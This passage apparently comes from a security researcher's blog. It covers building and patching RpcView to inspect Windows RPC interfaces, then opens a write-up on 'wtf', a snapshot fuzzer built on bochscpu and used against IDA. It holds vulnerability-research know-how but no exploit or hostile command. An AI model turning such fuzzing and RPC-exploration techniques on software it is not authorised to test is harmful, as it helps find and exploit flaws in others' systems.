After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you leave all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to dowload all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of each file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
};

We can see that each version number is represented as a longlong value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041C = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)
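To double-check the math, here is a small stand-alone C++ sketch (not part of RpcView) that packs a four-part file version into this longlong format; the 16-bit field layout is an assumption based on the conversion shown above.

#include <cstdint>
#include <cstdio>

// Pack a "major.minor.build.revision" file version into the 64-bit layout
// used by RPC_CORE_RUNTIME_VERSION (four 16-bit fields, assumed layout).
constexpr uint64_t PackRpcrtVersion(const uint16_t Major, const uint16_t Minor,
                                    const uint16_t Build, const uint16_t Revision) {
  return (uint64_t(Major) << 48) | (uint64_t(Minor) << 32) |
         (uint64_t(Build) << 16) | uint64_t(Revision);
}

int main() {
  // 10.0.19041.1052 -> 0xa00004a61041c
  printf("%#llx\n", (unsigned long long)PackRpcrtVersion(10, 0, 19041, 1052));
  return 0;
}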

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
};

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bit compilation process, but if you want to compile the 32-bit version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).
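If you want to sanity-check the byte pattern before editing anything, a tiny C++ sketch like the one below (same assumptions as the packing sketch earlier) prints the packed value in the little-endian order it appears in on disk:

#include <cstdint>
#include <cstdio>
#include <cstring>

int main() {
  // 10.0.19041.1052 packed as shown earlier.
  const uint64_t Version = 0xA00004A61041CULL;
  uint8_t Bytes[sizeof(Version)];
  memcpy(Bytes, &Version, sizeof(Version)); // x86/x64 is little-endian
  for (const uint8_t B : Bytes) {
    printf("%02X", B); // prints 1C04614A00000A00
  }
  printf("\n");
  return 0;
}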

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is a section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries: Microsoft publishes their associated PDB (Program DataBase) files.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is that time of the year when I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows target: user or kernel mode, applications, services, or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code in some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and slow to start. The snapshot approach could help fuzz it faster than a traditional approach would allow,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, reading and writing registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work, so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run Intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs' devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump,
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, which is why writing across two pages needs extra care.
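To illustrate the kind of care needed, here is a rough sketch of a cross-page-safe physical write. It is not wtf's actual code: PhysTranslate stands in for whatever GPA-to-HVA lookup the backend provides (bochscpu_mem_phy_translate in this case), and Page::Size is assumed to be 0x1000.

#include <algorithm>
#include <cstdint>
#include <cstring>

namespace Page { constexpr uint64_t Size = 0x1000; }

// Hypothetical helper: returns the HVA backing a guest physical page.
extern uint8_t *PhysTranslate(const uint64_t Gpa);

// Sketch: write Size bytes at guest physical address Gpa, chunking the copy
// at page boundaries because adjacent GPAs may map to non-adjacent HVAs.
bool PhysWrite(uint64_t Gpa, const uint8_t *Buffer, uint64_t Size) {
  while (Size > 0) {
    const uint64_t Offset = Gpa & (Page::Size - 1);
    const uint64_t Chunk = std::min(Size, Page::Size - Offset);
    uint8_t *Hva = PhysTranslate(Gpa & ~(Page::Size - 1));
    if (Hva == nullptr) {
      return false;
    }
    memcpy(Hva + Offset, Buffer, Chunk);
    Gpa += Chunk;
    Buffer += Chunk;
    Size -= Chunk;
  }
  return true;
}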

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.
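As a rough illustration of what that MMU emulation boils down to, below is a simplified 4-level page-table walk. It is a sketch only: it assumes 4KB pages everywhere, ignores large pages and access bits, and PhysRead64 is a hypothetical helper that reads a 64-bit value from guest physical memory.

#include <cstdint>
#include <optional>

// Hypothetical helper: read a 64-bit value at a guest physical address.
extern uint64_t PhysRead64(const uint64_t Gpa);

// Simplified GVA -> GPA translation: walk PML4 -> PDPT -> PD -> PT.
std::optional<uint64_t> VirtTranslate(const uint64_t Cr3, const uint64_t Gva) {
  const uint64_t Indexes[] = {
      (Gva >> 39) & 0x1ff, // PML4 index
      (Gva >> 30) & 0x1ff, // PDPT index
      (Gva >> 21) & 0x1ff, // PD index
      (Gva >> 12) & 0x1ff  // PT index
  };

  uint64_t Table = Cr3 & ~0xfffULL;
  for (const uint64_t Index : Indexes) {
    const uint64_t Entry = PhysRead64(Table + (Index * 8));
    if ((Entry & 1) == 0) {
      return std::nullopt; // Not present; this is where a #PF gets inserted.
    }
    Table = Entry & 0x000ffffffffff000ULL;
  }

  return Table + (Gva & 0xfff);
}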

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loops

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }
}

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address to the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs in one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.
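To give an idea of what that looks like, here is a minimal sketch (error handling stripped, paths are placeholders; this is not the actual Debugger_t code) that opens a crash dump with dbgeng and resolves a symbol to an address:

#include <windows.h>
#include <dbgeng.h>
#include <cstdio>

#pragma comment(lib, "dbgeng.lib")

int main() {
  IDebugClient *Client = nullptr;
  IDebugControl *Control = nullptr;
  IDebugSymbols *Symbols = nullptr;

  // Create the client and grab the control / symbols interfaces.
  DebugCreate(__uuidof(IDebugClient), (void **)&Client);
  Client->QueryInterface(__uuidof(IDebugControl), (void **)&Control);
  Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&Symbols);

  // Point dbgeng at the symbol store and load the kernel crash dump.
  Symbols->SetSymbolPath("srv*C:\\SYMBOLS*https://msdl.microsoft.com/download/symbols");
  Client->OpenDumpFile("state\\mem.dmp");
  Control->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);

  // Resolve a symbol to a virtual address.
  ULONG64 Offset = 0;
  Symbols->GetOffsetByName("nt!ExGenRandom", &Offset);
  printf("nt!ExGenRandom = %016llx\n", Offset);
  return 0;
}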

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

